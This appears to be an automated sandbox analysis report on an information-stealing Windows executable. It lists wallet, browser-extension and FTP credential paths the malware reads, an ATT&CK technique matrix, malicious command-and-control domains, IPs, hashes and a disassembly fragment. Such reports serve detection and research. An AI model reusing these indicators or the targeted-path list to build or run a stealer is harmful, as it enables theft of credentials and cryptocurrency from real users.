        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\LFOPODGVOHJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 2.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000002.00000002.2421617824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
        Windows Management Instrumentation
        1
        DLL Side-Loading
        311
        Process Injection
        21
        Virtualization/Sandbox Evasion
        2
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Screen Capture
        21
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading
        311
        Process Injection
        LSASS Memory241
        Security Software Discovery
        Remote Desktop Protocol1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Deobfuscate/Decode Files or Information
        Security Account Manager21
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares41
        Data from Local System
        3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
        Obfuscated Files or Information
        NTDS1
        Process Discovery
        Distributed Component Object Model3
        Clipboard Data
        114
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Software Packing
        LSA Secrets1
        Application Window Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials11
        File and Directory Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
        System Information Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe52%VirustotalBrowse
        SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe56%ReversingLabsWin64.Trojan.Generic
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        armamenti.world/dsIOQn100%Avira URL Cloudmalware
        rugbybrign.life/gKAozj100%Avira URL Cloudmalware
        https://rugbybrign.life/gKAozjC100%Avira URL Cloudmalware
        targett.top/dsANGt100%Avira URL Cloudmalware
        https://rugbybrign.life/100%Avira URL Cloudmalware
        armoryarch.shop/GiqwY100%Avira URL Cloudmalware
        pistolpra.bet/dABYyaz100%Avira URL Cloudmalware
        https://rugbybrign.life/gKAozj100%Avira URL Cloudmalware
        selfdefens.bet/dASBUz100%Avira URL Cloudmalware
        weaponwo.life/NghsayA100%Avira URL Cloudmalware
        https://rugbybrign.life/gKAozj1.1100%Avira URL Cloudmalware
        caliberc.today/KowpqlL100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        bg.microsoft.map.fastly.net
        199.232.214.172
        truefalse
          high
          rugbybrign.life
          104.21.32.1
          truetrue
            unknown
            t.me
            149.154.167.99
            truefalse
              high
              pki-goog.l.google.com
              142.250.186.67
              truefalse
                high
                c.pki.goog
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://t.me/kz_prokla2false
                    high
                    rugbybrign.life/gKAozjtrue
                    • Avira URL Cloud: malware
                    unknown
                    pistolpra.bet/dABYyaztrue
                    • Avira URL Cloud: malware
                    unknown
                    armoryarch.shop/GiqwYtrue
                    • Avira URL Cloud: malware
                    unknown
                    weaponwo.life/NghsayAtrue
                    • Avira URL Cloud: malware
                    unknown
                    selfdefens.bet/dASBUztrue
                    • Avira URL Cloud: malware
                    unknown
                    targett.top/dsANGttrue
                    • Avira URL Cloud: malware
                    unknown
                    https://rugbybrign.life/gKAozjfalse
                    • Avira URL Cloud: malware
                    unknown
                    armamenti.world/dsIOQntrue
                    • Avira URL Cloud: malware
                    unknown
                    caliberc.today/KowpqlLtrue
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://rugbybrign.life/MSBuild.exe, 00000002.00000002.2422497815.0000000000F32000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://rugbybrign.life/gKAozjCMSBuild.exe, 00000002.00000002.2422292826.0000000000ED7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://rugbybrign.life/gKAozj1.1MSBuild.exe, 00000002.00000002.2422063672.0000000000EBC000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.21.32.1
                    rugbybrign.lifeUnited States
                    13335CLOUDFLARENETUStrue
                    149.154.167.99
                    t.meUnited Kingdom
                    62041TELEGRAMRUfalse
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1640351
                    Start date and time:2025-03-17 08:19:13 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 50s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@4/0@4/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 85%
                    • Number of executed functions: 50
                    • Number of non-executed functions: 111
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 23.60.203.209, 2.23.77.188, 4.245.163.56, 199.232.214.172, 20.242.39.171
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e3913.cd.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    03:20:10API Interceptor8x Sleep call for process: MSBuild.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.21.32.1SHIPPING DETAILS_PDF.exeGet hashmaliciousFormBookBrowse
                    • www.auto-total.info/3lc9/
                    arGdXDmyGJ.exeGet hashmaliciousFormBookBrowse
                    • www.rbopisalive.cyou/a669/
                    2rvyZc27tz.exeGet hashmaliciousFormBookBrowse
                    • www.kdrqcyusevx.info/k7wl/
                    Final PayStub.exeGet hashmaliciousFormBookBrowse
                    • www.oddsideodylicoopod.cloud/g43m/?chops=VTj0v6ZXr6p4dp&Ezr8U8lh=iHr8ZanSEmppv2NUfEI3Sn+a6zMFeevffxq5V5At5Kf3VZBf0vxOCE6EQW7iEjpklZqKgy7LQg==
                    JOB NO. AIQ8478.bat.exeGet hashmaliciousLokibotBrowse
                    • touxzw.ir/sccc/five/fre.php
                    DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                    • www.rbopisalive.cyou/2dxw/
                    MmF9tcIj1J.exeGet hashmaliciousFormBookBrowse
                    • www.newanthoperso.shop/lqfq/
                    Payment Invoice ref0306252.exeGet hashmaliciousFormBookBrowse
                    • www.rbopisalive.cyou/a669/
                    DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                    • www.rbopisalive.cyou/2dxw/
                    RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeGet hashmaliciousFormBookBrowse
                    • www.kdrqcyusevx.info/k7wl/
                    149.154.167.99http://45.142.208.144.sslip.io/blog/Get hashmaliciousUnknownBrowse
                    • telegram.org/img/emoji/40/F09F9889.png
                    http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                    • telegram.org/img/favicon.ico
                    http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                    • telegram.org/
                    http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                    • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                    http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                    • telegram.org/
                    http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                    • telegram.org/
                    http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                    • telegram.org/?setln=pl
                    http://makkko.kz/Get hashmaliciousUnknownBrowse
                    • telegram.org/
                    http://telegram.dogGet hashmaliciousUnknownBrowse
                    • telegram.dog/
                    LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                    • t.me/cinoshibot
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    t.meSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeGet hashmaliciousLummaC StealerBrowse
                    • 149.154.167.99
                    12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                    • 149.154.167.99
                    FNLJD8Q3.exeGet hashmaliciousVidarBrowse
                    • 149.154.167.99
                    Nexol.exe.bin.exeGet hashmaliciousLummaC StealerBrowse
                    • 149.154.167.99
                    file.exeGet hashmaliciousVidarBrowse
                    • 149.154.167.99
                    GalaxySoft.exeGet hashmaliciousLummaC StealerBrowse
                    • 149.154.167.99
                    loader.exeGet hashmaliciousLummaC StealerBrowse
                    • 149.154.167.99
                    Install.exeGet hashmaliciousLummaC Stealer, RHADAMANTHYSBrowse
                    • 149.154.167.99
                    ShadowOF-Launcher.exeGet hashmaliciousLummaC StealerBrowse
                    • 149.154.167.99
                    mhtyieskfda.exeGet hashmaliciousLummaC StealerBrowse
                    • 149.154.167.99
                    pki-goog.l.google.com#U6d59#U6c5f#U6eab#U5dde#U75c5#U6bd2.exeGet hashmaliciousUnknownBrowse
                    • 172.217.18.3
                    Fork.exeGet hashmaliciousBabadedaBrowse
                    • 142.250.186.163
                    The Earth.exeGet hashmaliciousUnknownBrowse
                    • 142.250.185.227
                    zsd5jgZ9LU.exeGet hashmaliciousDanaBotBrowse
                    • 142.250.185.99
                    LaunchV.2.exeGet hashmaliciousLummaC StealerBrowse
                    • 142.250.186.99
                    SecuriteInfo.com.Win32.RATX-gen.28955.11907.exeGet hashmaliciousXWormBrowse
                    • 142.250.184.227
                    SecuriteInfo.com.Win32.RATX-gen.23694.15705.exeGet hashmaliciousXWormBrowse
                    • 172.217.18.3
                    SecuriteInfo.com.Win32.RATX-gen.1407.14828.exeGet hashmaliciousSugarDump, XWormBrowse
                    • 142.250.186.67
                    file.exeGet hashmaliciousVidarBrowse
                    • 142.250.185.163
                    DiscordNitrofree2021.exeGet hashmaliciousUnknownBrowse
                    • 142.250.181.227
                    rugbybrign.lifebpyisefjjthawdtr.exeGet hashmaliciousLummaC StealerBrowse
                    • 104.21.32.1
                    bg.microsoft.map.fastly.netSpy-Net.exeGet hashmaliciousSalityBrowse
                    • 199.232.210.172
                    #U6d59#U6c5f#U6eab#U5dde#U75c5#U6bd2.exeGet hashmaliciousUnknownBrowse
                    • 199.232.210.172
                    The Earth.exeGet hashmaliciousUnknownBrowse
                    • 199.232.210.172
                    USE INCASE OF A SEVERE FORKIE.exeGet hashmaliciousBabadedaBrowse
                    • 199.232.210.172
                    theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                    • 199.232.210.172
                    FNLJD8Q3.exeGet hashmaliciousUnknownBrowse
                    • 199.232.210.172
                    MTE PO - 0515-000112.xlsGet hashmaliciousUnknownBrowse
                    • 199.232.210.172
                    zsd5jgZ9LU.exeGet hashmaliciousDanaBotBrowse
                    • 199.232.214.172
                    LaunchV.2.exeGet hashmaliciousLummaC StealerBrowse
                    • 199.232.214.172
                    shit.exe.bin.exeGet hashmaliciousUnknownBrowse
                    • 199.232.214.172
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    TELEGRAMRUSecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeGet hashmaliciousLummaC StealerBrowse
                    • 149.154.167.99
                    12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                    • 149.154.167.99
                    FNLJD8Q3.exeGet hashmaliciousVidarBrowse
                    • 149.154.167.99
                    SpotifyStartupTask.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 149.154.167.220
                    Crack2025.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                    • 149.154.167.220
                    M6gQuZPvgY.exeGet hashmaliciousAmadey, LummaC Stealer, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse
                    • 149.154.167.220
                    Ogdu1MivyN.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                    • 149.154.167.220
                    SecuriteInfo.com.Python.Agent-ACY.11661.1637.exeGet hashmaliciousUnknownBrowse
                    • 149.154.167.220
                    shit.exe.bin.exeGet hashmaliciousUnknownBrowse
                    • 149.154.167.220
                    Nexol.exe.bin.exeGet hashmaliciousLummaC StealerBrowse
                    • 149.154.167.99
                    CLOUDFLARENETUShttps://phoenixdiag.rs/.apple/Get hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    order confirmation.exeGet hashmaliciousSnake KeyloggerBrowse
                    • 104.21.16.1
                    Quotation submitting.exeGet hashmaliciousFormBookBrowse
                    • 188.114.96.3
                    BID_TERMS.EXE.exeGet hashmaliciousFormBookBrowse
                    • 188.114.96.3
                    XWCTtOuD5e.exeGet hashmaliciousPython Stealer, Exela Stealer, NjratBrowse
                    • 162.159.134.233
                    SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeGet hashmaliciousLummaC StealerBrowse
                    • 104.21.48.1
                    sample.zip.zipGet hashmaliciousGlobeimposterBrowse
                    • 172.67.74.152
                    na.elfGet hashmaliciousMiraiBrowse
                    • 172.67.160.128
                    stk.dllGet hashmaliciousUnknownBrowse
                    • 172.67.69.236
                    re.bot.arm5.elfGet hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeGet hashmaliciousLummaC StealerBrowse
                    • 104.21.32.1
                    • 149.154.167.99
                    stk.dllGet hashmaliciousUnknownBrowse
                    • 104.21.32.1
                    • 149.154.167.99
                    12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                    • 104.21.32.1
                    • 149.154.167.99
                    SystemProcess18.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                    • 104.21.32.1
                    • 149.154.167.99
                    Setup.exeGet hashmaliciousUnknownBrowse
                    • 104.21.32.1
                    • 149.154.167.99
                    Setup.exeGet hashmaliciousUnknownBrowse
                    • 104.21.32.1
                    • 149.154.167.99
                    #Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7#Ud835#Udde8#Ud835#Udde3.exeGet hashmaliciousUnknownBrowse
                    • 104.21.32.1
                    • 149.154.167.99
                    2PFebPN0qK.exeGet hashmaliciousLatrodectus, LummaC StealerBrowse
                    • 104.21.32.1
                    • 149.154.167.99
                    #Ud835#Udde6#Ud835#Uddd8#Ud835#Udde7#Ud835#Udde8#Ud835#Udde3.exeGet hashmaliciousUnknownBrowse
                    • 104.21.32.1
                    • 149.154.167.99
                    LaunchV.2.exeGet hashmaliciousLummaC StealerBrowse
                    • 104.21.32.1
                    • 149.154.167.99
                    No context
                    No created / dropped files found
                    File type:PE32+ executable (console) x86-64, for MS Windows
                    Entropy (8bit):7.643117173349902
                    TrID:
                    • Win64 Executable Console (202006/5) 92.65%
                    • Win64 Executable (generic) (12005/4) 5.51%
                    • Generic Win/DOS Executable (2004/3) 0.92%
                    • DOS Executable Generic (2002/1) 0.92%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe
                    File size:588'288 bytes
                    MD5:b18d980cfdce9f0758cdc8db9e7f6bf4
                    SHA1:5afe3fc037fcd313d26f01b2dfc0b00300ffb047
                    SHA256:3ee484b7245b7f30f8301359e525b219d8343cbbd407b266db4429b676f1653a
                    SHA512:2c32291355477e9f197f68c2be4b29eeaf585365108966c3a87ec85045509c107ee6a1c99356b604dce83fc1f43f0f1f3d50c413b4fa00980a69879a4023a2f8
                    SSDEEP:12288:1WCzTM2dzPblUrAv5oSZAROpMHq1xw86W40tqTIriQX+C1K8fTrvlU:1UePp94O6W4NMawlU
                    TLSH:81C4E16E32561CEAED73487CCED57A45DA73382A8F11CBF706A441211E235D29D3EB22
                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....}.g.........."............................@.............................p............`........................................
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x14001831c
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x140000000
                    Subsystem:windows cui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x67D57DF5 [Sat Mar 15 13:17:41 2025 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:fd2739e7ebf69dea0556a52b87570850
                    Instruction
                    dec eax
                    sub esp, 28h
                    call 00007FF574CE2BA0h
                    dec eax
                    add esp, 28h
                    jmp 00007FF574CE27C7h
                    int3
                    int3
                    dec eax
                    sub esp, 28h
                    call 00007FF574CE2964h
                    dec eax
                    neg eax
                    sbb eax, eax
                    neg eax
                    dec eax
                    dec eax
                    add esp, 28h
                    ret
                    int3
                    inc eax
                    push ebx
                    dec eax
                    sub esp, 20h
                    dec eax
                    cmp dword ptr [0001E092h], FFFFFFFFh
                    dec eax
                    mov ebx, ecx
                    jne 00007FF574CE2959h
                    call 00007FF574CE4881h
                    jmp 00007FF574CE2961h
                    dec eax
                    mov edx, ebx
                    dec eax
                    lea ecx, dword ptr [0001E07Ch]
                    call 00007FF574CE47E4h
                    xor edx, edx
                    test eax, eax
                    dec eax
                    cmove edx, ebx
                    dec eax
                    mov eax, edx
                    dec eax
                    add esp, 20h
                    pop ebx
                    ret
                    int3
                    int3
                    dec eax
                    sub esp, 18h
                    dec esp
                    mov eax, ecx
                    mov eax, 00005A4Dh
                    cmp word ptr [FFFE7C69h], ax
                    jne 00007FF574CE29CAh
                    dec eax
                    arpl word ptr [FFFE7C9Ch], cx
                    dec eax
                    lea edx, dword ptr [FFFE7C59h]
                    dec eax
                    add ecx, edx
                    cmp dword ptr [ecx], 00004550h
                    jne 00007FF574CE29B1h
                    mov eax, 0000020Bh
                    cmp word ptr [ecx+18h], ax
                    jne 00007FF574CE29A6h
                    dec esp
                    sub eax, edx
                    movzx edx, word ptr [ecx+14h]
                    dec eax
                    add edx, 18h
                    dec eax
                    add edx, ecx
                    movzx eax, word ptr [ecx+06h]
                    dec eax
                    lea ecx, dword ptr [eax+eax*4]
                    dec esp
                    lea ecx, dword ptr [edx+ecx*8]
                    dec eax
                    mov dword ptr [esp], edx
                    dec ecx
                    cmp edx, ecx
                    je 00007FF574CE296Ah
                    mov ecx, dword ptr [edx+0Ch]
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x32c780x28.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x380000x15b4.pdata
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000x668.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2b1e00x140.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
